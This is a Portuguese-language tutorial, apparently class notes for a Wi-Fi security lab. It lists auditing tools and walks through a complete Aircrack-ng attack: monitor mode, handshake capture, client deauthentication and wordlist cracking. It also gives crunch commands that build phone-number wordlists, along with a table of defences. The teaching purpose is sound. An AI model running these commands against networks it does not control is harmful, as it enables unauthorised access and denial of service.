Ferramentas de Redes Sem Fio (802.11)

Testando a Segurança Wi-Fi

As mesmas ferramentas usadas por atacantes podem ser usadas para defender suas redes.

Pré-requisito

Consulte Fundamentos e conceitos de Redes Sem Fio para entender a teoria.


💻 Comandos Básicos de Rede

Linux

ifconfig          # Visualiza e configura interfaces
iwconfig          # Configuração de interfaces wireless
ip addr           # Visualiza endereços IP
iw dev            # Lista dispositivos wireless

Windows

ipconfig                          # Visualiza configurações de rede
netsh wlan show interfaces        # Visualiza interfaces Wi-Fi
netsh wlan show profiles          # Lista redes salvas

🛠️ Ferramentas Essenciais

Arsenal para Auditoria Wi-Fi

FerramentaDescrição
Aircrack-ngSuíte completa para auditoria Wi-Fi (mais utilizada no mundo)
WifiteScript Python para ataques automatizados
AirgeddonAtaques automatizados de Evil Twin
KismetAuditoria e detecção de intrusão (WIDS)
WashEscaneia roteadores com WPS ativado
ReaverExplora vulnerabilidades do WPS
BullyImplementação melhorada do Reaver
CowpattyForça bruta em senhas Wi-Fi
PyritQuebra de senhas usando GPU
CrunchGerador de wordlists

⚡ Wifite

Automatização Simples

Ferramenta automatizada que simplifica ataques em redes Wi-Fi.

# Uso básico (seguir menu interativo)
wifite
 
# Escanear apenas redes com WPS
sudo wifite --wps-only --random-mac --skip-crack --power 35

Utilize wifite --help ou man wifite para mais opções.


🔧 Suíte Aircrack-ng

Executar como root

Todos os comandos devem ser executados com privilégios de administrador.

Comandos Principais

ComandoFunção
airmon-ngGerencia modo monitor
airodump-ngCaptura pacotes e lista redes
aireplay-ngInjeção de pacotes
aircrack-ngQuebra de senhas

Fluxo de Ataque Completo

# 1. Ativar modo monitor
airmon-ng start wlan0
 
# 2. Visualizar redes próximas
airodump-ng wlan0mon
 
# 3. Definir canal do alvo
iwconfig wlan0mon channel 10
 
# 4. Capturar handshake do alvo específico
airodump-ng wlan0mon --bssid 00:1A:3F:8D:57:42 -w captura -c 8
 
# 5. Desautenticar clientes (em outro terminal)
aireplay-ng -0 0 -a 00:1A:3F:8D:57:42 wlan0mon
 
# 6. Quebrar senha com wordlist
aircrack-ng captura-01.cap -w /usr/share/wordlists/rockyou.txt

🔗 Aircrack-ng - Site Oficial


📝 Wordlists

Listas de Senhas para Força Bruta

Wordlists Comuns

  • rockyou.txt — Lista clássica com milhões de senhas vazadas
  • Localização no Kali: /usr/share/wordlists/rockyou.txt.gz

Gerando Wordlists Personalizadas

# Números de celular (998XXXXXX)
crunch 9 9 0123456789 -t 998@@@@@@ -o celulares998.txt
 
# Números de celular (999XXXXXX)
crunch 9 9 0123456789 -t 999@@@@@@ -o celulares999.txt
 
# Com DDD
crunch 11 11 0123456789 -t 22998@@@@@@ -o celulares22998.txt
 
# Todos os números de 8 dígitos
crunch 8 8 0123456789 -o numeros8.txt
 
# Juntar arquivos
cat celulares* > celulares.txt

⚔️ Ataques Comuns e Medidas

Ataques e Defesas

AtaqueDescriçãoMedida Defensiva
DoS (Deauth)Derrubar redes ou clientesMonitoramento com WIDS
Ataque WPSExplorar protocolo WPSDesabilitar WPS
Força BrutaQuebrar senha por tentativaSenhas longas e complexas
Evil TwinRoteador falso para roubar credenciaisVerificar certificados, usar VPN

🎯 Roteiro de Aula Prática

Passo a Passo

  1. ☐ Conectar placa Wi-Fi na porta USB do computador
  2. ☐ Abrir a máquina virtual Kali Linux
  3. ☐ Menu: Dispositivos > USB > Atheros
  4. ☐ Verificar interface com ifconfig (procurar wlan0)
  5. ☐ Se houver problemas, reconectar placa e reiniciar Kali
  6. ☐ Seguir tutorial do Aircrack-ng ou Wifite
  7. ☐ Realizar ataques em ambiente controlado

🔍 Outras Ferramentas

FerramentaUso
KarmaAtaque Evil Twin via PNL (Preferred Network List)
BeholderAnti-karma, detecta anomalias em redes Wi-Fi
mdk3/mdk4Ataques de deauthentication em massa
LinsetEvil Twin automatizado